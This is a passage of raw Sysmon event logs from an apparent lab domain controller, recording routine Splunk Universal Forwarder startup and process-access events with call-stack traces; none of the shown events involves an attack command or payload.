Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.479{733EE690-3E0D-5F80-5400-000000007F01}38442548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5400-000000007F01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5400-000000007F01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.244{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0D-5F80-5400-000000007F01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.249{733EE690-3E0D-5F80-5400-000000007F01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.198{733EE690-3E0C-5F80-5300-000000007F01}40243504C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-6200-000000007F01}4040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-6200-000000007F01}4040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.916{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-6200-000000007F01}4040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program 